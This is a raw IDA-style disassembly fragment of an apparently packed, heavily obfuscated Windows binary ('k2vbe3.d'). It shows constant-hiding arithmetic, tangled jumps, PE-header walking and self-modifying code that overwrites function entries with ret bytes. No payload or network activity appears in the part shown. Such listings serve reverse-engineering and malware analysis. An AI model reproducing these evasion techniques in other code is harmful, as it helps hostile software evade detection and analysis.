; START	OF FUNCTION CHUNK FOR sub_43C04E

loc_455B2F:				; CODE XREF: sub_43C04Ej
		mov	eax, ds:dword_44BCF8
		or	eax, eax
		jnz	loc_44775C
		jmp	loc_45AAE6
; END OF FUNCTION CHUNK	FOR sub_43C04E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_333. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_455B43:				; CODE XREF: k2vbe3.d:0045112Cj
		jmp	loc_45BC42
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4580DF

loc_455B48:				; CODE XREF: sub_4580DF-9477j
		jbe	loc_43D64C

loc_455B4E:				; CODE XREF: k2vbe3.d:0045AB55j
		cmp	edx, 194AF98Fh
		jmp	loc_45BE8A
; END OF FUNCTION CHUNK	FOR sub_4580DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_455B59:				; CODE XREF: sub_45A323:loc_4414FCj
		xchg	ebx, [esp+10h+var_10]
		pushf
		push	7093A816h
		pop	eax
		or	eax, 0FEF684A9h
		sub	eax, ds:4000EFh
		jmp	loc_450183
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------

loc_455B74:				; CODE XREF: k2vbe3.d:0044BC15j
		mov	ecx, ebp
; START	OF FUNCTION CHUNK FOR sub_44E388

loc_455B76:				; CODE XREF: sub_44E388:loc_44BBFFj
		xor	eax, 24D801Ah
		xchg	eax, [esp+0]
		pushf
		push	21DD950Bh
		pop	eax
		rol	eax, 0Eh
		and	eax, 0AE780C17h
		jmp	loc_457D0C
; END OF FUNCTION CHUNK	FOR sub_44E388
; ---------------------------------------------------------------------------

locret_455B94:				; CODE XREF: k2vbe3.d:loc_444F34j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D823

loc_455B95:				; CODE XREF: sub_43D823:loc_457184j
		push	eax
		call	sub_444DA9
		mov	[ebp-8], eax
		push	offset loc_45B7F4
		jmp	loc_459A15
; END OF FUNCTION CHUNK	FOR sub_43D823
; ---------------------------------------------------------------------------

loc_455BA8:				; CODE XREF: k2vbe3.d:00440255j
		jnz	loc_44FD73
		add	edx, ebp
		jge	loc_446DF3
		sbb	ecx, 38E5D36Fh
		jmp	loc_456E16
; ---------------------------------------------------------------------------
		mov	esp, ebp
		pop	ebp
		push	offset sub_44CBB3
		jmp	locret_455A99
; ---------------------------------------------------------------------------

loc_455BCE:				; CODE XREF: k2vbe3.d:00446E70j
		xchg	ebx, [esp]
		push	edi
		push	8FB218F9h
		pop	edi
		add	edi, 3CAFC7Ah
		jmp	loc_447303
; ---------------------------------------------------------------------------

loc_455BE3:				; CODE XREF: k2vbe3.d:loc_456083j
					; DATA XREF: sub_455F48+7o
		push	eax
		call	sub_453347
		retn

; =============== S U B	R O U T	I N E =======================================



sub_455BEA	proc near		; CODE XREF: sub_45512F-1848Ep

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00441843 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00446437 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044B9F4 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044D8FB SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044F6EA SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00450292 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004521C6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455A64 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00455E92 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00459EA5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B162 SIZE 0000000B BYTES

		push	esi
		jmp	loc_44D8FB
sub_455BEA	endp

; ---------------------------------------------------------------------------
		push	offset sub_440CEA
		jmp	loc_43CF96
; ---------------------------------------------------------------------------

loc_455BFA:				; CODE XREF: k2vbe3.d:00453632j
		mov	byte ptr [eax],	0C3h
		jmp	loc_44652B
; ---------------------------------------------------------------------------

loc_455C02:				; CODE XREF: k2vbe3.d:0044A9D1j
		call	sub_441484
; START	OF FUNCTION CHUNK FOR sub_45C27A

loc_455C07:				; CODE XREF: sub_45C27A-1B490j
					; sub_45C27A-1B47Aj
		add	eax, 2617DD17h
		xor	eax, 6358FDDEh
		add	eax, ebp
		push	offset sub_43CF35
		jmp	loc_44E3F8
; END OF FUNCTION CHUNK	FOR sub_45C27A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EBBF

loc_455C1F:				; CODE XREF: sub_44EBBF+14j
		pop	ecx
		sub	ecx, 0CAEE175Ch
		rol	ecx, 18h
		test	ecx, 40h
		jmp	loc_448C87
; END OF FUNCTION CHUNK	FOR sub_44EBBF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458725

loc_455C34:				; CODE XREF: sub_458725+Fj
		push	433507B5h
		pop	ebx
		sub	ebx, 59A0D518h
		rol	ebx, 19h
		jmp	loc_440374
; END OF FUNCTION CHUNK	FOR sub_458725
; ---------------------------------------------------------------------------

loc_455C48:				; CODE XREF: k2vbe3.d:loc_44F4DFj
		mov	[edx], eax
		pop	edx
		lea	eax, sub_448380
		mov	byte ptr [eax],	0C3h
		jmp	sub_448380
; ---------------------------------------------------------------------------
		call	nullsub_12
		jmp	loc_441EA6
; ---------------------------------------------------------------------------

loc_455C63:				; DATA XREF: k2vbe3.d:004569E9o
		push	53D872BDh
		pop	eax
		xor	eax, 565CC717h
		cmp	eax, 455C3D5Bh
		jmp	loc_44311B

; =============== S U B	R O U T	I N E =======================================



sub_455C7A	proc near		; CODE XREF: sub_44B912+2686p
					; k2vbe3.d:00457ECCj

; FUNCTION CHUNK AT 0043C780 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043DD9B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443278 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044356F SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044431B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446EC0 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00447748 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AEE0 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044D976 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450B26 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004516AB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004553F7 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00459737 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0045983B SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00459F1F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A968 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045AF9E SIZE 0000001B BYTES

		xchg	edx, [esp+0]
		pop	edx
		add	eax, 3Ch
		mov	eax, [eax]
		add	eax, [ebp-4]
		add	eax, 18h
		jmp	loc_45A968
sub_455C7A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_455C8E:				; CODE XREF: sub_44B912-2FF2j
		ja	loc_458FC2

loc_455C94:				; CODE XREF: sub_44B912:loc_45BF36j
		mov	eax, [ebp-4]
		add	eax, 3Ch
		mov	eax, [eax]
		push	esi
		push	72F7757Ch
		pop	esi
		jmp	loc_449AD1
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------

loc_455CA8:				; CODE XREF: k2vbe3.d:00442F2Cj
		and	ebp, 11141C1h
		push	ebp
		adc	eax, ebp
		jmp	loc_4463B8
; ---------------------------------------------------------------------------

loc_455CB6:				; CODE XREF: k2vbe3.d:004425B7j
		jnz	loc_44060F
		jmp	loc_44E40C
; ---------------------------------------------------------------------------
		retn
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_305. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_455CC3	proc near		; CODE XREF: sub_44B194:loc_43E0CDj
					; sub_4486D7:loc_44018Cj ...
		push	ebp
		call	sub_4521CB
sub_455CC3	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_43E470

loc_455CC9:				; CODE XREF: sub_43E470+193C6j
		jmp	loc_4494F6
; END OF FUNCTION CHUNK	FOR sub_43E470
; ---------------------------------------------------------------------------

loc_455CCE:				; CODE XREF: k2vbe3.d:004501ABj
		jmp	loc_44686E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443A30

loc_455CD3:				; CODE XREF: sub_443A30+F431j
		jb	loc_45A0B5

loc_455CD9:				; CODE XREF: sub_443A30:loc_452E54j
		or	edi, 6E58B7E9h
		xor	edi, 6F741C9Eh
		xor	edx, edi
		pop	edi

loc_455CE8:				; CODE XREF: sub_44866A:loc_448C42j
		jmp	loc_449171
; END OF FUNCTION CHUNK	FOR sub_443A30
; ---------------------------------------------------------------------------

loc_455CED:				; CODE XREF: k2vbe3.d:00441C55j
		jnp	loc_451DCC

loc_455CF3:				; CODE XREF: k2vbe3.d:00455DA8j
		js	loc_442B6C
		jmp	loc_44DBA3

; =============== S U B	R O U T	I N E =======================================



sub_455CFE	proc near		; CODE XREF: sub_45B20A-1C7E1p
					; k2vbe3.d:0045952Ej
		xchg	ebx, [esp+0]
		pop	ebx
		lea	eax, sub_445FE0
		mov	byte ptr [eax],	0C3h
		jmp	loc_442C64
sub_455CFE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

locret_455D10:				; CODE XREF: k2vbe3.d:0045B6CFj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FB6

loc_455D11:				; CODE XREF: sub_442FB6+Fj
		jmp	loc_44CD35
; END OF FUNCTION CHUNK	FOR sub_442FB6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442CA7

loc_455D16:				; CODE XREF: sub_442CA7+7j
		jmp	loc_4578CD
; END OF FUNCTION CHUNK	FOR sub_442CA7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E282

loc_455D1B:				; CODE XREF: sub_43E282+9j
		jmp	loc_441B8F
; END OF FUNCTION CHUNK	FOR sub_43E282

; =============== S U B	R O U T	I N E =======================================



sub_455D20	proc near		; DATA XREF: k2vbe3.d:loc_44180Co

; FUNCTION CHUNK AT 0044865B SIZE 00000005 BYTES

		lea	eax, sub_44FF97
		mov	byte ptr [eax],	0C3h
		jmp	loc_44865B
sub_455D20	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FF97

loc_455D2E:				; CODE XREF: sub_44FF97j
					; k2vbe3.d:004582ABj
		pop	edx
		call	sub_44FBDF

loc_455D34:				; CODE XREF: k2vbe3.d:0043EEB1j
		jmp	loc_451209
; END OF FUNCTION CHUNK	FOR sub_44FF97
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4582DD

loc_455D39:				; CODE XREF: sub_4582DD-17A3Fj
		xor	esi, ecx
		jnz	loc_4596B2
		jmp	loc_44C7F8
; END OF FUNCTION CHUNK	FOR sub_4582DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443E9D

loc_455D46:				; CODE XREF: sub_443E9D+Cj
		mov	eax, [esp-4+arg_0]
		push	edx
		call	sub_44F49C
		mov	eax, 0F75CA70h
		call	sub_4553CC
		mov	ds:off_41E0D8, eax
		lea	eax, sub_443E9D
		mov	byte ptr [eax],	0C3h
		jmp	loc_442820
; END OF FUNCTION CHUNK	FOR sub_443E9D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_133. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_455D6E:				; CODE XREF: sub_450F71:loc_441782j
		and	esi, 95D3DFAEh
		xor	esi, 5A8FD78Ah
		add	eax, esi
		pop	esi
		mov	eax, [eax]
		shl	eax, 2
		jmp	loc_44F5BE
; END OF FUNCTION CHUNK	FOR sub_450F71
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E2A4

loc_455D87:				; CODE XREF: sub_44E2A4:loc_443291j
		call	sub_43E135

loc_455D8C:				; CODE XREF: sub_44B2D7:loc_44FACCj
		mov	eax, 0BC7399C0h
		call	sub_4553CC
		push	edi
		push	2AEE4D53h
		pop	edi
		and	edi, ds:4000E8h
		jmp	loc_44D26D
; END OF FUNCTION CHUNK	FOR sub_44E2A4
; ---------------------------------------------------------------------------
		ja	loc_455CF3
		js	loc_454F01
		jmp	sub_44809D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45756B

loc_455DB9:				; CODE XREF: sub_45756B+10j
		mov	byte ptr [eax],	0C3h
		jmp	loc_43C044
; END OF FUNCTION CHUNK	FOR sub_45756B
; ---------------------------------------------------------------------------
		pop	edx
		mov	eax, [esp]
		push	edx
		call	sub_447BE9
		mov	eax, 0DD1C4F2h
		push	ebx
		jmp	loc_44C951
; ---------------------------------------------------------------------------
		push	ebx
		push	0CDD76DD0h
		pop	ebx
		xor	ebx, 41648818h
		jmp	loc_45BE3A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_135. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C7D

loc_455DE9:				; CODE XREF: sub_440C7D+18581j
		xor	eax, 0B9217116h
		call	sub_4412A1

loc_455DF4:				; CODE XREF: sub_45B4EE-11A48j
		jmp	sub_43C04E
; END OF FUNCTION CHUNK	FOR sub_440C7D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A1B1

loc_455DF9:				; CODE XREF: sub_44A1B1-434Dj
		jmp	loc_458DF8
; END OF FUNCTION CHUNK	FOR sub_44A1B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450CBF

loc_455DFE:				; CODE XREF: sub_450CBF:loc_440475j
		jnz	loc_4563A2
		jmp	loc_44D06E
; END OF FUNCTION CHUNK	FOR sub_450CBF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C002

loc_455E09:				; CODE XREF: sub_45C002:loc_449948j
		xor	ebx, 2C69C792h
		add	ebx, 0ACADC8FBh
		mov	[ebx], eax
		pop	ebx
		lea	eax, nullsub_483
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_483
; END OF FUNCTION CHUNK	FOR sub_45C002
; ---------------------------------------------------------------------------

loc_455E26:				; CODE XREF: k2vbe3.d:0043E07Dj
		jp	loc_43FF4C
		popf
		jmp	loc_44503A

; =============== S U B	R O U T	I N E =======================================



sub_455E32	proc near		; CODE XREF: k2vbe3.d:loc_441E7Bp
					; k2vbe3.d:00446755j
		xchg	edi, [esp+0]
		pop	edi
		mov	byte ptr [eax],	0C3h
		jmp	loc_451956
sub_455E32	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		push	edx
		push	1F12E0BCh
		pop	edx
		sub	edx, 354B6A72h
		jmp	loc_44CE34
; ---------------------------------------------------------------------------
		mov	ds:off_41E12C, eax
		lea	eax, sub_441FEB
		mov	byte ptr [eax],	0C3h
		jmp	sub_441FEB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441FEB

loc_455E64:				; CODE XREF: sub_441FEBj
		call	sub_43DA0B

loc_455E69:				; CODE XREF: sub_457A23+19j
		jmp	nullsub_197
; END OF FUNCTION CHUNK	FOR sub_441FEB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440CEA

loc_455E6E:				; CODE XREF: sub_440CEA+16910j
		jmp	loc_443B00
; END OF FUNCTION CHUNK	FOR sub_440CEA
; ---------------------------------------------------------------------------

loc_455E73:				; CODE XREF: k2vbe3.d:0044791Aj
		jmp	locret_44797C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454EBB

loc_455E78:				; CODE XREF: sub_454EBB:loc_4420ABj
		add	[ebp-0Ah], al
		xor	eax, eax
		mov	al, [ebp-0Ah]
		shr	eax, 4
		xor	[ebp-0Ah], al
		jmp	loc_448D8E
; END OF FUNCTION CHUNK	FOR sub_454EBB
; ---------------------------------------------------------------------------
		cmp	ecx, ebp
		jmp	loc_45B497
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455BEA

loc_455E92:				; CODE XREF: sub_455BEA:loc_459EA5j
		pop	esi
		push	4CF138D7h
		pop	eax
		sub	eax, 0CA1B374Eh
		rol	eax, 1
		xor	eax, 0F4F001E0h
		test	eax, 10h
		jmp	loc_450292
; END OF FUNCTION CHUNK	FOR sub_455BEA
; ---------------------------------------------------------------------------

loc_455EB2:				; CODE XREF: k2vbe3.d:0043DE8Ej
		test	ebp, ebx
		jmp	loc_4451DA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_455EB9:				; CODE XREF: sub_43CCD0+1089Ej
		push	ecx
		push	0AED2E77Bh
		pop	ecx
		and	ecx, 5BC6615Dh
		jmp	loc_450884
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------

loc_455ECB:				; CODE XREF: k2vbe3.d:0043DB71j
		not	edx
		sub	ecx, esi
		ror	esi, 0Dh
; START	OF FUNCTION CHUNK FOR sub_452092

loc_455ED2:				; CODE XREF: sub_452092:loc_43DB60j
		add	ebx, 0BC23299Ah
		jmp	loc_43F685
; END OF FUNCTION CHUNK	FOR sub_452092
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_166. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AD1E

loc_455EDE:				; CODE XREF: sub_44AD1E+Dj
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_44AD1E
; ---------------------------------------------------------------------------

loc_455EE3:				; CODE XREF: k2vbe3.d:004463CCj
		jmp	loc_45C185
; ---------------------------------------------------------------------------

loc_455EE8:				; CODE XREF: k2vbe3.d:00440A38j
		jmp	loc_4561CC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F028

loc_455EED:				; CODE XREF: sub_44F028+A6Bj
		push	9FC4EE3Ah
		pop	eax
		sub	eax, 0A49B7DA5h
		add	eax, 0AF77C827h
		xor	eax, 46A65509h
		add	eax, 8FA0972Eh
		cmp	eax, 6613235Ch
		jmp	loc_4490D7
; END OF FUNCTION CHUNK	FOR sub_44F028
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448113

loc_455F16:				; CODE XREF: sub_448113:loc_448B2Dj
		jbe	loc_446B3A
		jmp	loc_4449FC
; END OF FUNCTION CHUNK	FOR sub_448113
; ---------------------------------------------------------------------------

loc_455F21:				; DATA XREF: sub_4481DC+133Do
		mov	al, [eax]
		mov	[ebp-9], al
		mov	al, [ebp-0Ah]
		and	al, 7
		mov	[ebp-0Bh], al
		jmp	loc_44CA10
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E135

loc_455F33:				; CODE XREF: sub_43E135:loc_459956j
		rol	eax, 19h
		popf
		adc	esi, 0BA35008Dh
		jmp	loc_45C344
; END OF FUNCTION CHUNK	FOR sub_43E135
; ---------------------------------------------------------------------------

loc_455F42:				; CODE XREF: k2vbe3.d:00456D1Bj
		or	ecx, 0AE4DDD44h

; =============== S U B	R O U T	I N E =======================================



sub_455F48	proc near		; CODE XREF: sub_4423D2:loc_45AE9Cp
		xchg	ebx, [esp+0]
		pop	ebx
		rol	eax, 0Dh
		push	offset loc_455BE3
		jmp	nullsub_198
sub_455F48	endp

; ---------------------------------------------------------------------------

loc_455F59:				; CODE XREF: k2vbe3.d:004595A2j
		ror	edi, 0Eh
; START	OF FUNCTION CHUNK FOR sub_44067C

loc_455F5C:				; CODE XREF: sub_44067C:loc_45957Aj
		add	esi, 91599330h
		xchg	esi, [esp-4+arg_0]
		jmp	sub_446E1E
; END OF FUNCTION CHUNK	FOR sub_44067C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_26. PRESS	KEYPAD "+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_455F6B	proc near		; CODE XREF: sub_444966-42DAp
					; k2vbe3.d:loc_443898j	...

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004402C1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441FD7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445277 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0045705D SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045B789 SIZE 00000010 BYTES

		push	ebp
		mov	ebp, esp
		push	esi
		jmp	loc_45B789
sub_455F6B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EC4A

loc_455F74:				; CODE XREF: sub_44EC4A+2174j
		call	sub_443A95
		mov	eax, 8CA83E2Ch
		push	esi
		push	5CCE72CBh
		jmp	loc_4564C0
; END OF FUNCTION CHUNK	FOR sub_44EC4A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457DCA

loc_455F89:				; CODE XREF: sub_457DCA:loc_43C9C6j
		pop	eax
		sub	eax, 6B648E8Eh
		xor	eax, 0E57627EBh
		xchg	eax, [esp+4+var_4]
		call	sub_45A323
		push	ecx
		mov	ecx, edi
		xchg	ecx, [esp+0]
		jmp	loc_444414
; END OF FUNCTION CHUNK	FOR sub_457DCA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4589FD

loc_455FA9:				; CODE XREF: sub_4589FD+Aj
		or	edx, 25516200h
		rol	edx, 1Ch
		add	edx, 0FB03D26Fh
		and	edx, 52BC3C43h
		add	edx, 0AE0D17D0h
		push	offset loc_45155F
		jmp	loc_44CFB2
; END OF FUNCTION CHUNK	FOR sub_4589FD
; ---------------------------------------------------------------------------

loc_455FCE:				; CODE XREF: k2vbe3.d:0044D6FBj
		adc	ecx, eax
; START	OF FUNCTION CHUNK FOR sub_4460FD

loc_455FD0:				; CODE XREF: sub_4460FD:loc_44D6E8j
		add	ecx, 0D22BE772h
		xchg	ecx, [esp+0]
		jmp	sub_45B20A
; END OF FUNCTION CHUNK	FOR sub_4460FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E00F

loc_455FDE:				; CODE XREF: sub_44E00F:loc_44E017j
		push	0AF414D9Dh
		pop	esi
		xor	esi, 6EF2160Bh
		or	esi, 0BD29EDF0h
		jmp	loc_459233
; END OF FUNCTION CHUNK	FOR sub_44E00F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E753

loc_455FF5:				; CODE XREF: sub_43E753+3B8Aj
		xchg	ebx, [esp+0Ch+var_C]
		mov	ecx, ebx
		pop	ebx
		or	ecx, 80F573Bh
		xor	ecx, 0B1B071E6h
		add	ecx, 92C56DBCh
		popf

loc_45600E:				; CODE XREF: k2vbe3.d:0044E119j
		jmp	loc_45144D
; END OF FUNCTION CHUNK	FOR sub_43E753
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_456013:				; CODE XREF: sub_44C90E-43A1j
		push	esi
		rol	ebp, 5
		not	edi
		jmp	loc_4472C2
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442CA7

loc_45601E:				; CODE XREF: sub_442CA7+115C9j
		call	sub_4479A1
		mov	eax, 0D6CB94Ch
		push	ecx
		push	0BD49E7B4h
		pop	ecx
		rol	ecx, 0Fh
		xor	ecx, 5C4D12Eh
		add	ecx, 0A26AB7Ah
		jmp	loc_44BDAC
; END OF FUNCTION CHUNK	FOR sub_442CA7
; ---------------------------------------------------------------------------

loc_456043:				; CODE XREF: k2vbe3.d:004591CCj
		jnb	loc_44902A

loc_456049:				; CODE XREF: k2vbe3.d:004494D9j
		jmp	locret_44946E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F20A

loc_45604E:				; CODE XREF: sub_44F20A-C3A0j
		jmp	nullsub_12
; END OF FUNCTION CHUNK	FOR sub_44F20A
; ---------------------------------------------------------------------------
		add	edx, 390357B6h
		jb	loc_44E70C
		and	ebp, 80B3C5E6h
		ror	ebp, 1Ch
		jmp	loc_449024
; ---------------------------------------------------------------------------

loc_45606D:				; CODE XREF: k2vbe3.d:0044B8AEj
		and	eax, 738B1557h
		add	eax, 0FDBB403Ch
		push	offset sub_43CB88
		jmp	loc_459ED2
; ---------------------------------------------------------------------------

loc_456083:				; CODE XREF: k2vbe3.d:0044A4A1j
					; k2vbe3.d:0044C86Aj
		jl	loc_455BE3
; START	OF FUNCTION CHUNK FOR sub_449372

loc_456089:				; CODE XREF: sub_449372:loc_43E730j
		sbb	edx, ecx
		jmp	loc_450E8E
; END OF FUNCTION CHUNK	FOR sub_449372
; ---------------------------------------------------------------------------

loc_456090:				; CODE XREF: k2vbe3.d:0044058Aj
		ja	sub_454F3E
		jb	loc_45BC61
		cmp	ebp, 0B8D243A2h
		jmp	loc_44E9F6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44469A

loc_4560A7:				; CODE XREF: sub_44469A:loc_453C86j
		pop	ecx
		sub	ecx, 0CFBE966Ah
		cmp	ecx, 0D0FBAB4Dh
		jmp	loc_44A23E
; END OF FUNCTION CHUNK	FOR sub_44469A
; ---------------------------------------------------------------------------

loc_4560B9:				; CODE XREF: k2vbe3.d:loc_43F8A3j
					; k2vbe3.d:004558D8j
		call	sub_4436CE
		push	22507EF4h
		pop	edx
		or	edx, 0FC533607h
		add	edx, 7F532DC9h
		call	sub_45B20A
		push	eax
		ror	eax, 19h
		jmp	loc_44FF60
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_540. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45080C

loc_4560DF:				; CODE XREF: sub_45080C+16j
		jmp	loc_456CD1
; END OF FUNCTION CHUNK	FOR sub_45080C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444966

loc_4560E4:				; CODE XREF: sub_444966:loc_449337j
		jl	loc_45B335
		sbb	esi, 7FC18B2Ch
		or	edi, 28EBF8D0h
		ror	ebx, 16h
		jmp	loc_449BA9
; END OF FUNCTION CHUNK	FOR sub_444966
; ---------------------------------------------------------------------------

loc_4560FE:				; CODE XREF: k2vbe3.d:00441EB9j
		xchg	edx, eax

; =============== S U B	R O U T	I N E =======================================



sub_456100	proc near		; CODE XREF: sub_4424CF:loc_44CA05p

; FUNCTION CHUNK AT 004569D8 SIZE 0000000B BYTES

		xchg	esi, [esp+0]
		pop	esi
		rol	eax, 0Eh
		push	ecx

loc_456108:				; CODE XREF: k2vbe3.d:loc_444BBDj
		jmp	loc_4569D8
sub_456100	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458B9B

loc_45610D:				; CODE XREF: sub_458B9B-E0B0j
		mov	esi, eax
		sub	edx, esi
		xor	ecx, esi
		mov	esi, [eax]
		jmp	loc_43DA62
; END OF FUNCTION CHUNK	FOR sub_458B9B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44083C

loc_45611A:				; CODE XREF: sub_44083C:loc_455999j
		test	ebp, edi
		jmp	loc_45A2C3
; END OF FUNCTION CHUNK	FOR sub_44083C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_456121:				; CODE XREF: sub_45A323-6AD4j
		jnz	loc_457556
		jmp	loc_456BEF
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44128B

loc_45612C:				; CODE XREF: sub_44128B+3134j
		ror	esi, 1

loc_45612E:				; CODE XREF: sub_44128B:loc_43E465j
		push	66B62538h
		pop	edx
		and	edx, 8E9AA99Ah
		xor	edx, 92C41DE7h
		add	edx, ebp
		jmp	loc_456A20
; END OF FUNCTION CHUNK	FOR sub_44128B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B999

loc_456147:				; CODE XREF: sub_44B999-8A94j
					; k2vbe3.d:loc_458A0Cj
		xor	ebx, edx
		sbb	ebx, eax
		jmp	sub_450F04
; END OF FUNCTION CHUNK	FOR sub_44B999
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441A09

loc_456150:				; CODE XREF: sub_441A09:loc_45AECAj
		mov	eax, [ebp+8]
		mov	ecx, [eax]
		add	eax, 4
		mov	ebx, [eax]
		push	ecx
		jmp	loc_43CBD9
; END OF FUNCTION CHUNK	FOR sub_441A09
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44083C

loc_456160:				; CODE XREF: sub_44083C+14D32j
		jnz	loc_44C3AA
		jmp	loc_455999
; END OF FUNCTION CHUNK	FOR sub_44083C

; =============== S U B	R O U T	I N E =======================================



sub_45616B	proc near		; CODE XREF: sub_447DCDj
					; DATA XREF: sub_45346B-B6A8o

; FUNCTION CHUNK AT 0043DC1C SIZE 0000000E BYTES

		and	ecx, ebx
		pop	ebx
		pushf
		push	0D5908D0Eh
		jmp	loc_43DC1C
sub_45616B	endp

; ---------------------------------------------------------------------------

loc_456179:				; CODE XREF: k2vbe3.d:0044DDD4j
		retn
; ---------------------------------------------------------------------------
